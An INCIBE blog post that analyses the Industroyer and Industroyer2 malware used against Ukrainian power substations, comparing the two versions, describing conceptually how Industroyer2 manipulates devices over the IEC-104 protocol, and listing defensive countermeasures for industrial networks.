Industroyer2, the ampere strikes back

Posted date 09/02/2023
Autor
INCIBE (INCIBE)
Factory drawing

In 2016 the Group of attackers called Sandworm made use of a malware designed to attack electrical substations, which was named as Industroyer. This malware was able to leave part of Kiev without electricity in the middle of winter. Following this attack, ESET malware researcher Anon Cherepanov conducted research into the capabilities, methods and techniques used by the malware.Visual summary of the attack executed by Industroyer

- Visual summary of the attack executed by Industroyer -

Anton Cherepanov determined that the Industroyer malware had managed to spread thought the entire substation network in search of industrial control devices that had very specific communication protocols. The main targets of the malware included disabling protective relays, opening circuit breakers, and removing the trace created by the malware itself. It is worth noting that on the only occasion that Industroyer was executed, some of its functionalities failed, so the final damage was less than it should have been.

In April 2022, a new attack with similar traits to those employed in Industroyer, was detected. This is remarkable because attacks targeting OT environments are not commonly reused, but in this case, a new version of the first malware was re-executed against another similar victim. This new malware is known as Industroyer2 and it is considered as an update of the old malware, with a more customizable nature, allowing it to be tailored to new and more specific targets.

The appearance of Industroyer2 reinforces the idea that OT malware can be repurposed for use against different victims within the industrial space, but this has not prevented different security measures implemented in industrial systems from mitigating or stopping a large number of attacks. This was the case of Industroyer2, whose mitigation was possible thanks to the research carried out on its predecessor.

The following illustration clearly shows the differences between the two versions. To highlight, the use of a single protocol, as mentioned above, the simplicity of the malware in its second version, because it is more specific, and the use of other types of malwares, such as CaddyWiper, which was used for the destruction of traces and information from the Industroyer2.Visual comparison of the malware pieces


- Visual comparison of the malware pieces -

In the bowels of Industroyer2

The Industroyer2 malware is similar to its predecessor, but its range of action is much smaller, making it more customizable. This new feature makes it possible to focus the attack on more specific structures and to operate more efficiently.

There are major differences between the two malwares, the main ones being:

  • Industroyer2 is stand-alone and only implements the IEC 60870-5-104 (IEC-104) communications protocol. This protocol is used to monitor and control RTU systems from which the control of substation power system is achieved via TCP/IP.
  • Industroyer2 is considered a highly configurable malware, whose code base is based on the code of its previous version. It contains hard-coded configurations in the lines of code and a list of Information Object Addresses (IOA) that will allow the attacker to change the state of the remote station associated with that address list. This IOA identifies a specific data element of a device and can be associated with a power line switch, circuit breaker or with a relay state configuration.

These new functionalities allow the operator to set very specific configuration parameters. Some of these parameters are shown in the following illustration:Industroyer2 code and parameters

- Industroyer2 code and parameters -

As can be seen in the picture, this new version has enabled the operator to clearly define the target IP address, the port through the IEC-104 and TCP protocol on which the attack is to be carried out, the substations (by means of an executable) and the list of objects on which the request will be directed, and which will allow modifications to be made to the device values.

The execution is simple, initially Industroyer2 will launch different messages of a control function, it will verify the communication and check that the remote station responds. Once the communication is open, the malware will proceed to open a channel for the data transferring with the remote station and, after sending the command to allow data transfer, the channel will be available. All this means that sending commands through the IEC-104 protocol is now possible and, therefore, the control of the state of the digital signals of the end devices.

Implications of these viruses

After the attacks was carried out by the Sandworm group, it can be deduced that this is only the beginning of a malware variant, the targets of which will be highly critical industrial infrastructures. A successful execution of a new version of Industroyer or Industroyer2 in a production environment can lead to disruptions of vital industrial processes, regardless of the specific industrial process, since, as we have seen, the flexibility now provided by the configuration of Industroyer2 makes this type of malware a headache for any industrial system defense team.

These industrial infrastructures, whether normal or critical, need to be at the forefront of attack information, defense teams and Red Team, Blue Team and Purple Team practices, in addition to checking the tactics and techniques employed by attackers on ICS in order to mitigate or stop potential intrusions into their systems.

Countermeasures against Industroyer and Industroyer2

Some of the recommended countermeasures to prevent this type of attack are listed below:

  • Apply YARA rules to generate alerts in case Industroyer or Industroyer2 in indicators of compromise are detected.
  • Implement anomaly detection tools and firewalls through the network to prevent the execution or propagation of this type of malware.
  • It is recommended to make use of inventory control and asset discovery tools in the network to manage the control systems and notify about possible attacks on each of them.
  • Implement a policy of continuous learning where both the team in charge of the company’s cyber defense and the different security devices are updated based on the information of new threats on their infrastructures.
  • Establish a robust cybersecurity incident response plan for any company infrastructure. In addition, it is recommended to conduct periodic Red Team exercises to test and analyze the effectiveness of the stablished incident response plan.

The points over, are some of the recommended countermeasures, but fully implementing them does not exempt an organization from being affected by a cybersecurity attack. It does, however, greatly reduce the percentage of critical consequences should a cyberattack be perpetuated.

Conclusion

The world of industrial environments is more threatened than ever, and this has only just begun. These new threats to industrial environments have broken the barrier between the cybernetic and the real, thus becoming a threat to people’s lives, given the enormous consequences that a properly executed attack on these infrastructures can have. 

However, not everything is going to be catastrophic and apocalyptic, since on the other side are the cybersecurity teams, analyzing all this type of malware and developing countermeasures for known attacks and even for the one that is not yet developed. Therefore, it is so important for cybersecurity teams in every company to invest time in training and learning, as well as adding intelligence to the various security devices deployed across the network.